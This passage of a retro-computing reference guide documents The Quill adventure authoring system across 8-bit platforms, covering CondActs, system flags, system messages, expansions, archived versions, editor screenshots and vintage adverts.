<td>DESTROYED objno.</td>
</tr>
<tr>
<td>NOTZERO flagno.</td>
<td>BBC</td>
</tr>
<tr>
<td>NOTEQ flagno.</td>
<td>BBC</td>
</tr>
</tbody>
</table>
### Machine-specific Sound Actions
<table>
<thead>
<tr>
<th>Action</th>
<th>Platform</th>
</tr>
</thead>
<tbody>
<tr>
<td>BEEP duration pitch</td>
<td>SPE</td>
</tr>
<tr>
<td>SOUND pitch duration</td>
<td>BBC</td>
</tr>
<tr>
<td>SOUND duration pitch</td>
<td>CPC, QL</td>
</tr>
<tr>
<td>SOUND frequency timing</td>
<td>APPLE</td>
</tr>
<tr>
<td>SOUND v p d vol</td>
<td>ATARI-ADW</td>
</tr>
<tr>
<td>SOUND register value</td>
<td>C64-ADW</td>
</tr>
<tr>
<td>SID regno. value</td>
<td>C64</td>
</tr>
<tr>
<td>MUSIC note duration</td>
<td>ORIC</td>
</tr>
<tr>
<td>VOLUME value</td>
<td>ORIC</td>
</tr>
</tbody>
</table>
### Machine-specific Display Actions
<table>
<thead>
<tr>
<th>Action</th>
<th>Platform(s)</th>
</tr>
</thead>
<tbody>
<tr>
<td>BORDER value</td>
<td>SPE C, C64, CPC, QL, ATARI-ADW</td>
</tr>
<tr>
<td>PAPER value</td>
<td>SPE C, C64, ORIC, QL, not C64-ADW</td>
</tr>
<tr>
<td>INK value</td>
<td>SPE C, C64, ORIC, QL</td>
</tr>
<tr>
<td>INK value value</td>
<td>CPC</td>
</tr>
<tr>
<td>SCREEN value</td>
<td>ATARI-ADW, C64-ADW, IBM-ADW</td>
</tr>
<tr>
<td>TEXT intensity</td>
<td>ATARI-ADW, IBM-ADW</td>
</tr>
<tr>
<td>CLS</td>
<td>SPE C, BBC, C64, CPC, ORIC, QL, APPLE, ATARI-ADW, IBM-ADW</td>
</tr>
</tbody>
</table>
### Other Version-Specific CondActs

<table>
<tbody>
<tr>
<td>DROPALL SPE C, BBC, C64, CPC, ORIC, QL, APPLE, ATARI-ADW, IBM-ADW</td>
</tr>
<tr>
<td>PLACE objno. locno.</td>
</tr>
<tr>
<td>AUTOG SPE C, BBC, CPC, QL</td>
</tr>
<tr>
<td>AUTOW SPE C, BBC, CPC, QL</td>
</tr>
<tr>
<td>AUTOR SPE C, BBC, CPC, QL</td>
</tr>
<tr>
<td>MES mesno.</td>
</tr>
<tr>
<td>STAR mesno.</td>
</tr>
<tr>
<td>SYSMESS sysno.</td>
</tr>
<tr>
<td>ADD flag1 flag2</td>
</tr>
<tr>
<td>SUB flag1 flag2</td>
</tr>
<tr>
<td>JSR lsb msb</td>
</tr>
<tr>
<td>PRINT flagno.</td>
</tr>
<tr>
<td>RAMSAVE QL</td>
</tr>
<tr>
<td>RAMLOAD QL</td>
</tr>
</tbody>
</table>
SPE C = Spectrum Serial C version.
C64-ADW CondActs are the same as C64 except where otherwise indicated.
IBM-ADW entries were found by experimentation (no manual archived).
## The Quill – System Flags
<table>
<thead>
<tr>
<th>Flag:</th>
<th>Standard Quill/ADW Usage</th>
<th>QL Usage</th>
<th>BBC Usage</th>
</tr>
</thead>
<tbody>
<tr>
<td>Flag 0</td>
<td>zero (light) – notzero (dark)</td>
<td></td>
<td>zero (dark) – notzero (light)</td>
</tr>
<tr>
<td>Flag 1</td>
<td>count of objects carried</td>
<td></td>
<td>count of objects carried</td>
</tr>
<tr>
<td>Flag 2</td>
<td>decreased when location described</td>
<td></td>
<td>current location number</td>
</tr>
<tr>
<td>Flag 3</td>
<td>decreased when location described & dark</td>
<td></td>
<td>Flags 3 – 46 standard single byte flags [BBC]</td>
</tr>
<tr>
<td>Flag 4</td>
<td>decreased when loc^n described & dark & object 0 absent</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flags 5 – 8</td>
<td>decreased each turn</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 9</td>
<td>decreased each turn when it’s dark</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 10</td>
<td>decreased each turn when it’s dark & object 0 absent</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 11-24</td>
<td>ordinary flags</td>
<td></td>
<td>Flags 11 – 59 (ordinary flags) [QL]</td>
</tr>
<tr>
<td>Flag 25</td>
<td>ordinary flag</td>
<td>2\textsuperscript{nd} word in C64-4wd</td>
<td></td>
</tr>
<tr>
<td>Flag 26</td>
<td>ordinary flag</td>
<td>3\textsuperscript{rd} word in C64-4wd</td>
<td></td>
</tr>
<tr>
<td>Flag 27</td>
<td>ordinary flag</td>
<td>splitscreen, start of text line number (SPE + Patch)</td>
<td></td>
</tr>
<tr>
<td>Flag 28</td>
<td>ordinary flag</td>
<td>screen, sound & ramsave/load controls (SPE + Patch)</td>
<td></td>
</tr>
<tr>
<td>Flag 29</td>
<td>ordinary flag</td>
<td>picture control in Illustrator (C64, CPC, SPE)</td>
<td></td>
</tr>
<tr>
<td>Flag 30</td>
<td>holds the score</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 31</td>
<td>holds turn count LSB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 32</td>
<td>holds turn count MSB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Flag 33</td>
<td>Do not exist as user accessible flags for Quill (SPE, CPC, C64, ORIC, etc.)</td>
<td>hidden (most Quill versions) diagnostic flag (ORIC, CPC & ADW) – parsed word1</td>
<td></td>
</tr>
<tr>
<td>Flag 34</td>
<td></td>
<td>hidden (most Quill versions) diagnostic flag (ORIC, CPC & ADW) – parsed word2</td>
<td></td>
</tr>
<tr>
<td>Flag 35</td>
<td></td>
<td>hidden (most Quill versions) diagnostic flag (ORIC, CPC & ADW) – location number</td>
<td></td>
</tr>
<tr>
<td>Flag 36</td>
<td></td>
<td>???</td>
<td></td>
</tr>
<tr>
<td>Flags 37 - 46</td>
<td></td>
<td>Flags 37+ Hidden flags storing object number</td>
<td></td>
</tr>
</tbody>
</table>
(Note the differences between flags 3 – 10... authors should use their own routines in the status table to replicate the behaviour of the flags on other platforms, if required)
Flags 47 – 63: locations (used with SPE + Kelsoft’s FIX)
Flags 47 – 63: double byte flags (PLUS, MINUS, ADD, SUB and PRINT all act as 16-bit calculations, i.e. they act on the flag and the next highest flag)
Flag 60: holds the score [QL]
Flag 61: holds turn count LSB [QL]
Flag 62: holds turn count MSB [QL]
*** Note the pseudo-flags 64+ are only used by the third-party extension for the ZX Spectrum version of The Quill; Kelsoft’s The Fix.
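The double-byte flag behaviour described above can be sketched in a few lines. This is a hypothetical model for illustration only (the helper names `read16`/`write16` are invented); the LSB/MSB convention matches the turn-count pair (flags 31/32) in the table above.

```python
# Sketch of the 16-bit "double byte" flag convention: the low byte lives
# in flag n and the high byte in flag n + 1, mirroring the turn-count
# LSB/MSB pair (flags 31/32). Hypothetical helpers, not Quill internals.

def read16(flags, n):
    """Combine flags[n] (LSB) and flags[n + 1] (MSB) into one value."""
    return flags[n] + 256 * flags[n + 1]

def write16(flags, n, value):
    """Split a 16-bit value across the LSB/MSB flag pair."""
    flags[n] = value % 256
    flags[n + 1] = (value // 256) % 256

flags = [0] * 64
write16(flags, 31, 1000)            # e.g. a turn count of 1000
print(flags[31], flags[32])         # -> 232 3  (232 + 256 * 3 == 1000)
print(read16(flags, 31))            # -> 1000
```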
## Object Start Locations
The following values are used to denote the start locations of objects (usually in menu option F). Note that the BBC version uses different values.
<table>
<thead>
<tr>
<th>Value</th>
<th>Regular Quill</th>
<th>BBC Quill</th>
</tr>
</thead>
<tbody>
<tr>
<td>252</td>
<td>not created</td>
<td></td>
</tr>
<tr>
<td>253</td>
<td>worn</td>
<td>carried</td>
</tr>
<tr>
<td>254</td>
<td>carried</td>
<td>worn</td>
</tr>
<tr>
<td>255</td>
<td></td>
<td>not created</td>
</tr>
</tbody>
</table>
Regular Quill values match up with the later equivalents in the PAW and DAAD, where 252 = not created, 253 = worn, 254 = carried and 255 = current location.
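Because the special values differ between the regular and BBC versions, anyone porting a database needs to remap them. A minimal sketch based on the table above (the helper `to_bbc` is hypothetical, not part of any Quill tool):

```python
# Translate object start-location codes from the regular Quill
# convention to the BBC version's, per the table above. Ordinary
# location numbers pass through unchanged. Hypothetical porting helper.

REGULAR_TO_BBC = {
    252: 255,  # not created
    253: 254,  # worn
    254: 253,  # carried
}

def to_bbc(value):
    return REGULAR_TO_BBC.get(value, value)

print(to_bbc(253))  # worn -> 254
print(to_bbc(7))    # a real location number -> 7
```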
## System Messages
Default system messages vary by serial and platform. Note: In early versions of The Quill (serial A) for ZX Spectrum the system messages could not be altered. A supplementary “you” file was used to define the player’s perspective.
In most versions, the system messages are only used by the Quill interpreter itself. The QL version allows the user to add additional system messages and to use the CondAct SYSMESS to print them (mirroring how that condact would be later used in the PAW).
Note: The BBC version does not have a separate bank of system messages: the standard messages 0 – 19 are used by the system itself.
0: [dark message]
1: I can also see:-
2: [What next? prompt]
3: [What next? prompt]
4: [What next? prompt]
5: [What next? prompt] **spare + Patch (SPE)
6: Sorry, I didn’t understand that. Try some different words.
7: I can’t go in that direction.
8: I can’t.
9: I have with me:-
10: (worn)
11: Nothing at all.
12: Do you really want to quit now?
13: [end of game message & try again? prompt]
14: Bye. Have a nice day.
15: OK.
16: [press any key to continue]
17: You have taken
18: turn
19: s
20: .
21: You have scored
22: %
23: I’m not wearing it.
24: I can’t. My hands are full.
25: I already have it.
26: It’s not here.
27: I can’t carry any more.
28: I don’t have it.
29: I’m already wearing it.
30: Y
31: N Note: #30 & #31 are the system yes/no replies
C64
32: Disc or Tape?
33: [Saving prompt – Type in name of file]
34: Start the tape
CPC
32: [Saving prompt - Type in name of file]
ORIC
32: [Saving prompt - Type in name of file]
33: Use SLOW cassette speed?
Adventure Writer – Apple, Atari
32: [Saving prompt – Type in name of file]
Adventure Writer - C64
32: Disc or Tape?
33: [Saving prompt – Type in name of file]
34: Start the tape
Adventure Writer – IBM
32: [Saving prompt – Type in name of file]
33: Enter disk drive:
## Official Expansion Programs
### The Illustrator (Gilsoft) – SPE, CPC, C64
The Illustrator, by Tim Gilberts, was available for the ZX Spectrum, Commodore 64 and Amstrad CPC platforms. It allowed authors to add graphics to their text adventures. Graphics were vector/line-and-fill style. A separate editor program was used to design the graphics and combine them with the completed adventure database.
C64 graphic modes included full screen picture (hi-res, 24 lines), full screen (with press any key message), split-screen picture & text, and scrolling text mode.
Spectrum & Amstrad CPC users were initially limited to full screen pictures using the Illustrator. Split screen modes were unlocked on the Spectrum via The Patch, and on the CPC via The Splitter.
### The Patch (Gilsoft) - SPE
The Patch, by Phil Wade, allowed Illustrator split-screen pictures to be incorporated in Spectrum text adventures. This facility was controlled with flag 27 (as it was in the C64 Illustrator). The Patch also provided a collection of other special effects, routines and features by utilising flag 28 with the PAUSE command. A small routine was also provided which replaced the printer routine in the Illustrator with one that saved the screens out to tape.
- Split-screen pictures
- Sound effects
- Switching between two typefaces/character sets
- Screen wipe effect
- Dynamic object limit
- Super-Quit and Crash features
- Different key-click options
- Dynamic replacement of system message 1
- Ramsave/Ramload
### The Press and the Expander (Gilsoft) - SPE
The Press and the Expander were written by Phil Wade for the ZX Spectrum Quill. The Press offered text compression and the Expander allowed larger text-only adventures beyond the usual top limit. By using both utilities, text-only adventures bigger than “40K” could be produced.
The Expander gives the user 6938 bytes extra on version C02 and 7338 bytes extra on version C05. The manual states that with good compression this could mean the equivalent of about 11K extra for an adventure.
### Characters (Gilsoft) - SPE
A simple character designer for the ZX Spectrum supplied with 20 premade character sets.
The font editor was created by Kevin Maddocks* of Sigma-Soft, and the included fonts had been available previously as Sigma’s Character Set Collection. (Kevin was also the author of the Quilled adventure Dwarfs Domain/Elfindor).
*note, his name is misspelled Kevin Madocs on the Characters packaging
### The Splitter (Gilsoft) - CPC
The Splitter was an official Illustrator support program that allowed split screen graphics to be added to Quilled adventures on the Amstrad CPC.
The Splitter gave the user the following options for images...
1. Full screen pictures (Illustrator default)
2. The picture to remain on the screen
3. The picture to be removed at the 'More...' prompt
The space allowed for an illustration in split screen mode could be from 1 to 21 lines.
## Other Third-Party Expansions
### The Fix, Mini-Fix, The Fix+ (Kelsoft) - SPE
Produced by Gerald Kellet of Kelsoft (who also made extensions for the GAC and PAWs), the Fix programs provided some interesting extra commands for Quill programmers on the Spectrum. By using a quirk in the editor, Kelsoft were able to add a series of pseudo-CondActs that were implemented using the OK action.
- four word parser
- multiple STATUS table passes
- flag operations (add two flags, subtract two flags)
- forced synonyms/event equivalents
- additional directions in vocab
- full screen pictures in Patch-ed adventures
Mini-Fix was a cheaper, cut-down version of The Fix with just the improved parser. It’s unclear if The Fix+ was ever released. Currently, the only known copy of The Fix is in the Gilsoft company archives.
### QUAID and the Replicator (Kelsoft) - SPE
Also produced by Kelsoft, the QUAID (“Quill Aid”) was a debugging tool for the Quill. The Replicator was a utility designed to assist in the duplication/publication of Quilled adventures. Neither utility is currently archived.
### The Enhancer (Bob Pape) – SPE [Never released]
Referenced in Bob Pape’s book ‘It’s Behind You! – The Making of a Computer Game’, The Enhancer was an expansion to the Quill that Bob produced which included features such as his own graphics routines. It was never released or made available to others.
## Unofficial versions of The Quill
There is a utility called Ballpoint in several of the Spectrum online archives. No details accompany it.
Although the menu is invisible in this program it follows the menu structure of serial C Spectrum Quill.
We believe this may be an early version of one of the unofficially “hacked about” Smart Egg versions of the Quill.
For reference, the Ballpoint shows as having 28896 bytes of memory available.
## Known Quill & Illustrator Archived Versions
See official repository [http://8-bit.info/the-gilsoft-adventure-systems/] for downloads
Platform-specific download sites (for other archived versions) listed below...
*work in progress – do you have any versions not listed?
<table>
<thead>
<tr>
<th>Format</th>
<th>Serial</th>
<th>Archived?</th>
<th>Platform-specific download site (for other versions not included in the official repository)</th>
</tr>
</thead>
<tbody>
<tr>
<td>Spectrum</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Quill</td>
<td>A03</td>
<td>YES</td>
<td>World of Spectrum <a href="https://www.worldofspectrum.org/">https://www.worldofspectrum.org/</a></td>
</tr>
<tr>
<td></td>
<td>A06</td>
<td>YES</td>
<td>Spectrum Computing <a href="https://spectrumcomputing.co.uk/">https://spectrumcomputing.co.uk/</a></td>
</tr>
<tr>
<td></td>
<td>A08</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>C02</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>C04</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>C05</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>Illustrator</td>
<td>A00</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>Amstrad</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Quill</td>
<td>A00 Tape*</td>
<td>YES</td>
<td>CPC-Power <a href="https://www.cpc-power.com/">https://www.cpc-power.com/</a></td>
</tr>
<tr>
<td></td>
<td>A01 Tape</td>
<td>YES</td>
<td>CPCrulez</td>
</tr>
<tr>
<td></td>
<td>A01 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>A04 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>Illustrator</td>
<td>A01 Tape</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>A02 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>C64</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Quill</td>
<td>A06 Disk</td>
<td>YES</td>
<td>Gamebase64 <a href="http://www.gamebase64.com/">http://www.gamebase64.com/</a></td>
</tr>
<tr>
<td></td>
<td>A06.4WD Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>B02 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>Illustrator</td>
<td>A00 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>BBC</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td>A00 Tape*</td>
<td>YES</td>
<td>Stairway to Hell <a href="http://www.stairwaytohell.com/">http://www.stairwaytohell.com/</a></td>
</tr>
<tr>
<td></td>
<td>A00 Disk*</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td></td>
<td>A03 Disk</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>Oric</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td>A00 Tape</td>
<td>YES</td>
<td></td>
</tr>
<tr>
<td>QL</td>
<td></td>
<td>NO</td>
<td></td>
</tr>
<tr>
<td>Atari</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td>Released?</td>
<td>NO</td>
<td></td>
</tr>
</tbody>
</table>
## Other Observations & Notes
### Oric & BBC table entries
Both the Oric and BBC versions use an * (asterisk) in their tables rather than an _ (underscore).
### Object type
The characteristics of an object (whether it can be worn & not just carried) are set by its associated word value in the vocabulary table.
12 < object vocab word < 200 : not-wearable (GD only)
199 < object vocab word : wearable (GDWR)
The initial Spectrum edition of the Quill (serial A) did not include such a distinction. If you are porting adventures from that version of the Quill then you will need to amend the vocabulary entries accordingly.
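The word-value ranges above can be expressed as a small check. A sketch for illustration (the function `object_type` is invented; the real test is internal to The Quill, and the behaviour for values of 12 or below is an assumption here):

```python
# Classify an object's capabilities from its vocabulary word value,
# following the ranges described above. Hypothetical helper; the
# "none" branch (word value <= 12) is an assumption for illustration.

def object_type(word_value):
    if 12 < word_value < 200:
        return "GD"    # can be Got and Dropped only
    if word_value > 199:
        return "GDWR"  # can also be Worn and Removed
    return "none"

print(object_type(100))  # -> GD
print(object_type(210))  # -> GDWR
```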
### Word types
Unlike in the PAWs & DAAD, words are not categorised into word types, such as verbs, nouns & adjectives. Words in the vocabulary table can be used as both verbs and nouns. Words can even be used twice in the same input, such as IRON IRON. Authors porting Quilled games to later Gilsoft-family systems, such as the PAW will need to think carefully about how they transfer across these sorts of entries.
### Differences between GET and DROP CondActs in The Quill and PAWs/DAAD
Although most CondActs behave very similarly in the Quill and the PAWs, making it very easy to port a game to later Gilsoft-family systems, care should be taken regarding the GET and DROP entries.
GET and DROP in The Quill are silent. They do not broadcast their effects.
However, in the PAWs, the GET and DROP CondActs trigger system messages 36 and 39, namely “You now have the…” and “You’ve dropped the…”
If you convert across an adventure to the PAWs, particularly if you wish to use the PAWs own object handling routines, then you will need to adjust the code accordingly. PLACE can be used in the PAWs in many cases where a silent GET or DROP is required.
Some clever Quill authors will have used the silent nature of the GET and DROP CondActs as a way of checking whether an object is carried and automatically generating a “You don’t have it” message if it’s not.
For example...
**LIGH LAMP DROP 1 GET 1 SWAP 1 0 OK**
If the player doesn’t have the lamp (object 1) then the DROP 1 will produce the message “You don’t have it” and stop processing the entry. i.e.
> **LIGHT LAMP**
> You don’t have it.
If the player has the lamp, it’s dropped and picked up silently, before the rest of the entry is processed (swapping an unlit lamp with the lit lamp) and printing the “OK” response. i.e.
> **LIGHT LAMP**
> OK.
In PAWs, the same line would generate the output...
> **LIGHT LAMP**
> You drop the lamp.
> You pick up the lamp.
> OK.
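As a sketch, the control flow of the LIGH LAMP trick can be modelled as below. This is a toy simulation (the function `light_lamp` and its carried-set representation are assumptions, not real Quill internals); it only shows why the entry aborts when the lamp isn't carried.

```python
# Toy model of the LIGH LAMP entry: DROP is silent on success, but a
# failed DROP prints "You don't have it." and stops the entry, so the
# rest of the line (GET, SWAP, OK) never runs. Not real Quill internals.

def light_lamp(carried):
    out = []
    if 1 not in carried:        # DROP 1 fails: lamp (object 1) not held
        out.append("You don't have it.")
        return out              # processing of the entry stops here
    carried.discard(1)          # DROP 1 (silent in The Quill)
    carried.add(1)              # GET 1  (silent in The Quill)
    # SWAP 1 0 would exchange the unlit and lit lamp objects here.
    out.append("OK.")           # OK prints the standard response
    return out

print(light_lamp(set()))        # -> ["You don't have it."]
print(light_lamp({1}))          # -> ["OK."]
```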
### MES, MESSAGE and SYSMESS
The standard Quill CondAct MESSAGE prints the contents of the specified message followed by a newline.
On the BBC, the additional CondAct MES prints the message without a newline (similar to the equivalent CondAct that appears in the PAWs & DAAD).
### Use of External Machine Code Routines
The BBC Micro version features the CondAct JSR which allows the user to trigger their own machine code routines. The example included in the BBC manual is an automatic exit routine.
## Useful Web Links
Gilsoft
http://www.gilsoft.co.uk/
Tim Gilberts
Twitter: https://twitter.com/timbucus/ Paypal: https://www.paypal.me/timgilberts
The official authorised Gilsoft repository, run by Stefan Vogt
http://8-bit.info/the-gilsoft-adventure-systems/
Graeme Yeandle’s Text Adventure Pages
http://graemeyeandle.atwebpages.com/advent/index.html
8bitAG.com – This document and other resources...
http://8bitag.com/info/#quill
AdventureWriter:
Apple: https://archive.org/details/Adventure_Writer_Master_Disk
C64: http://www.gamebase64.com/game.php?id=15332&d=18
IBM: https://www.myabandonware.com/game/adventurewriter-2gv
Mocagh archive (documentation):
Gilsoft related:
CodeWriter related:
The Illustrator manual (for C64) translated into Spanish by Igor Errazking
https://drive.google.com/file/d/1UNsL4Cp1naVJsZjTsshmafбуG7wNrdX0/view
Ported Quilled adventures & useful resources for specific formats...
Devwebcl’s Atari Quill site... Quill adventures ported to the Atari...
http://devwebcl.atarionline.pl/quill/quill.html
Andy Ford’s Spectrum to BBC ports...
http://www.retrosoftware.co.uk/wiki/index.php?title=SGAP
Auraes’ Quill to Z-Machine project...
https://gitlab.com/auraes/zquill
Tools for extracting Quilled databases...
unQUILL (Spectrum/CPC/C64 plus separate program for BBC databases)
https://www.seasip.info/Unix/UnQuill/
unPAWS (Spectrum databases only)
https://github.com/Utodev/unPAWs
Various Quill related tools & downloads on the Interactive Fiction archive:
https://www.ifarchive.org/indexes/if-archiveXprogrammingXquill.html
PAWmac (Windows) Quilled adventures to Spectrum PAW via inPAWs
https://retro.pagasus.org/pawmac/
Tips for Quill authors...
Simon Avery & Debby Howard – Using the Quill: A Beginner’s Guide
https://digdilem.org/freesoftware/text-adventures/
Adventure Coder fanzine by Chris Hester
https://archive.org/search.php?query=creator%3A%22Chris+Hester%22
Quill interviews & articles...
The Digital Antiquarian article on The Quill
https://www.filfre.net/2013/07/the-quill/
...with Graeme Yeandle
http://solutionarchive.com/interview_graeme/
...with Tim Gilbert
8-bit info: http://8-bit.info/2017/01/22/the-gilsoft-legacy/
Classic Adventurer (Issue 2): http://classicadventurer.co.uk/
## Appendix: Screenshots of editor & test mode with default database
ZX Spectrum A08 editor...
ZX Spectrum A08 test mode with default database...
ZX Spectrum C05 Editor
ZX Spectrum C05 test mode with default database...
I am in a prison cell. The walls are painted **Black** and **Yellow** and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright flashing light in one corner.
Tell me what to do.
Amstrad CPC A04 Editor
THE QUILL MAIN MENU A
[A] Vocabulary
[B] Message text
[C] Location text
[D] Movement table
[E] Object text
[F] Object start location
[G] Event table
[H] Status table
[I] System Messages
[J] Object Word
[I] Switch Main Menus
Select Facility Required
THE QUILL MAIN MENU B
[I] SAVE database
[J] Disc/Tape
[K] LOAD database
[L] Test adventure
[M] SAVE adventure
[N] CAT
[O] Bytes spare
[P] Objects conveyable
[Q] Permanent colours
[E] RETURN TO BASIC
[T] Switch Main Menus
Select Facility Required
Amstrad CPC A04 test mode with default database
I am in a prison cell. The walls are painted red and orange and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner. I’m ready for your instructions.
THE QUILL MAIN MENU
[A] Vocabulary
[B] Message text
[C] Location text
[D] Movement table
[E] Object text
[F] Object start location
[G] Event table
[H] Status table
[I] Save database
[J] Verify database
[K] Load database
[L] Test adventure
[M] Save adventure
[N] Verify adventure
[O] Bytes spare
[P] Objects conveyable
[Q] Permanent colours
[R] System messages
[S] Return to basic
Select Facility Required
C64 A06 / A06.4WD test adventure with default database
I am in a prison cell. The walls are painted Black and Yellow and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner.
Give me your command.
>
0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0
0 1 0 0 0 0 0 0 0 0 0 0
http://8bitag.com/info
BBC Model B Editor
The Quill
(C) Gilsoft 1985
by Neil Fleming-Smith
A...Vocabulary
B...Messages
C...Locations
D...Objects
E...Object words
F...Object start
G...Movement
H...Event
I...Status
J...Load database
K...Save database
L...Test adventure
M...Save adventure
N...Objects conveyable
O...Bytes spare
P...Star commands
BBC Model B test mode with default database
255
0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0
0 0 0 255
Undefined location.
?_
THE QUILL MAIN MENU
A> Vocabulary
B> Message text
C> Location text
D> Movement table
E> Object text
F> Object start location
G> Event table
H> Status table
I> Save database
J> Verify database
K> Load database
L> Test adventure
M> Save adventure
N> Verify adventure
O> Bytes spare
P> Objects conveyable
Q> Permanent colours
R> System messages
S> Return to BASIC
Select Facility Required
Test mode (default database) with diagnostic overlay...
I am in a prison cell. The walls are painted BLACK and GREEN and are perfectly smooth. The only way out is through a trap door in the ceiling which is 30 feet high.
I await your command.
Adventure Writer Apple II in test mode with default database...
I am in a prison cell. The walls are painted black and yellow and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner. I'm ready for your instructions.
Adventure Writer – Atari
**AdventureWriter Main Menu**
A...Vocabulary text
B...Message text
C...Location descriptions
D...Movement table
E...Object descriptions
F...Object starting locations
G...Vocabulary action table
H...Status table
I...Save a database
J...Load a database
K...Test this adventure
L...Save this adventure
M...Memory available
N...# of portable objects
O...Set display colors
P...AdventureWriter Messages
+...Exit AdventureWriter
Select an Option and Press RETURN
AdventureWriter Atari in test mode with default database...
I am in a prison cell. The walls are painted black and yellow and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner. I'm ready for your instructions.
Je suis dans une cellule, les murs qui sont absolument lisses, ont été peints en noir et jaune. La seule sortie est une trappe qui est située dans le plafond 10 m au dessus de moi. Il y a une lumière vive dans un coin.
Prêt à recevoir vos instructions.
(Translation: I am in a cell; the walls, which are perfectly smooth, have been painted black and yellow. The only way out is a trapdoor in the ceiling 10 m above me. There is a bright light in one corner. Ready to receive your instructions.)
AdventureWriter – IBM
AdventureWriter Main Menu
A ... Vocabulary text
B ... Message text
C ... Location descriptions
D ... Movement table
E ... Object descriptions
F ... Object starting locations
G ... Vocabulary action table
H ... Status table
I ... Save a database
J ... Load a database
K ... Test this adventure
L ... Save this adventure
M ... Memory available
N ... # of portable objects
U ... Set display colors
P ... AdventureWriter messages
+ ... Exit AdventureWriter
Select an Option and Press RETURN
(80 column editor)
AdventureWriter Main Menu
A ... Vocabulary text
B ... Message text
C ... Location descriptions
D ... Movement table
E ... Object descriptions
F ... Object starting locations
G ... Vocabulary action table
H ... Status table
I ... Save a database
J ... Load a database
K ... Test this adventure
L ... Save this adventure
M ... Memory available
N ... # of portable objects
U ... Set display colors
P ... AdventureWriter messages
+ ... Exit AdventureWriter
Select an Option and Press RETURN
(40 column editor)
I am in a prison cell. The walls are painted black and yellow and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner.
I await your command.
AdventureWriter C64 editor
AdventureWriter Main Menu
A...Vocabulary text
B...Message text
C...Location descriptions
D...Movement table
E...Object descriptions
F...Object starting locations
G...Vocabulary action table
H...Status table
I...Save a database
J...Verify a database
K...Load a database
L...Test this adventure
M...Save this adventure
N...Verify this adventure
O...Memory available
P...# of portable objects
Q...Set display colors
R...AdventureWriter Messages
S...Return to BASIC
Select an Option and Press RETURN
AdventureWriter C64 test mode with default database...
I am in a prison cell. The walls are painted Black and Yellow and are perfectly smooth. The only way out is through a trapdoor in the ceiling which is 30 feet high. There is a bright light in one corner.
I await your command.
Appendix
Some advertising examples...
THE QUILL
FOR THE 48K SPECTRUM AT £14.95
The Quill is a machine code Adventure authoring system which allows you to produce high speed machine code adventures without any knowledge of machine code. You may create well over 200 locations, describe and connect them. Then using a set of simple commands you can fill them with objects and problems of your own choice. Part completed adventures can be saved to tape for later completion. You may alter and experiment with your adventure with the greatest of ease. The completed adventure may be saved to tape and run independently of the Quill editor. The Quill is provided with a detailed tutorial manual which covers every aspect of its use in writing adventures. All this for only £14.95! We have produced a demo cassette giving further information and a sample of its use for only £2.00 inc. P&P.
EDUCATIONAL TAPES
CESIL..................................................£5.95
If you are starting ‘O’ level Computer studies this year you may well be required to learn the CESIL language. We have produced CESIL interpreters for the ZX Spectrum, 16K ZX81 and Dragon 32 which will allow you to write and run CESIL programs on your home computer thus gaining the familiarity with the language that examinations require. Supplied with full manual. Please specify machine type when ordering.
HAL..................................................£5.95
This is another ‘O’ level language used in some areas and is available for the ZX Spectrum only. Supplied with instructions.
VISUAL PROCESSOR..............................£5.95
Provides an on screen display of a simple micro-processor showing its internal operation as it runs programs. Full manual supplied. Available for the ZX Spectrum Only.
GILSOFT
30 Hawthorn Road, Barry, South Glam. CF6 8LE.
Tel: (0446) 736369
Our Software is available from many Computer Shops Nationwide, or direct from us by post or phone. S.A.E. for details.
ANNOUNCING
THE QUILL
FOR THE 48K SPECTRUM AT £14.95
The Quill is a major new utility written in machine code which allows even the novice programmer to produce high speed machine code adventures of superior quality to many available at the moment without any knowledge of machine code whatsoever.
